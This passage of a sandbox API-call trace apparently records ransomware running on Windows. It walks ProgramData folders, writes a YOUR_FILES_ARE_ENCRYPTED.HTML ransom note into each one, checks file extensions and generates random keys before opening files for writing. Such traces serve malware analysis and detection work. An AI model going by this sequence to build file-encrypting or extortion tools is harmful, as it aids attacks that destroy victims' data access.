lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.180] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.183] CloseHandle (hObject=0x598) returned 1 [0157.183] GetProcessHeap () returned 0x270000 [0157.184] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0157.184] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0e963b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0e963b0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Search", cAlternateFileName="")) returned 1 [0157.184] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned 35 [0157.184] GetProcessHeap () returned 0x270000 [0157.184] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.186] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search" [0157.187] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*" [0157.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0e963b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0e963b0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.187] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0e963b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0e963b0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.187] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Data", cAlternateFileName="")) returned 1 [0157.187] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned 40 [0157.187] GetProcessHeap () returned 0x270000 [0157.187] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.188] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data" [0157.188] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*" [0157.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.190] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.190] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0157.190] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned 53 [0157.190] GetProcessHeap () returned 0x270000 [0157.190] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.193] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications" [0157.193] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*" [0157.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.193] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd231e170, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd231e170, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0157.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd231e170, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd231e170, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 0 [0157.194] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.194] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0157.194] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.195] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.197] CloseHandle (hObject=0x58c) returned 1 [0157.198] GetProcessHeap () returned 0x270000 [0157.198] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.198] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0ebc510, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0157.198] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned 45 [0157.198] GetProcessHeap () returned 0x270000 [0157.199] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.199] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp" [0157.199] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*" [0157.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe94970d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.199] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe94970d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.199] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe94970d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.199] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.199] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.200] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.202] CloseHandle (hObject=0x58c) returned 1 [0157.203] GetProcessHeap () returned 0x270000 [0157.203] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.203] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0ebc510, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 0 [0157.203] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.204] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0157.204] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.204] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.206] CloseHandle (hObject=0x5a0) returned 1 [0157.207] GetProcessHeap () returned 0x270000 [0157.208] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.208] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Data", cAlternateFileName="")) returned 0 [0157.208] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.208] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0157.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.208] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.211] CloseHandle (hObject=0x598) returned 1 [0157.211] GetProcessHeap () returned 0x270000 [0157.212] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.221] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0157.221] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned 50 [0157.221] GetProcessHeap () returned 0x270000 [0157.221] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.223] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures" [0157.223] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*" [0157.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd282d030, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5AlR3U30D3.dat", cAlternateFileName="5ALR3U~1.DAT")) returned 1 [0157.224] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5AlR3U30D3.dat") returned 65 [0157.224] lstrcmpW (lpString1="5AlR3U30D3.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.225] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0157.225] lstrlenW (lpString=".dat") returned 4 [0157.225] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0157.225] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0157.225] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5AlR3U30D3.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5alr3u30d3.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0157.225] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=0) returned 1 [0157.225] CloseHandle (hObject=0x5a0) returned 1 [0157.226] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe51400a2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe51400a2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0157.226] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures") returned 67 [0157.226] GetProcessHeap () returned 0x270000 [0157.226] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.227] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures" [0157.227] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*" [0157.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe51400a2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe51400a2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.230] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe51400a2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe51400a2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.230] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf171085c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0157.230] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 82 [0157.230] lstrcmpW (lpString1="usertile10.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.230] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0157.230] lstrlenW (lpString=".bmp") returned 4 [0157.230] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0157.230] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf17369bc, 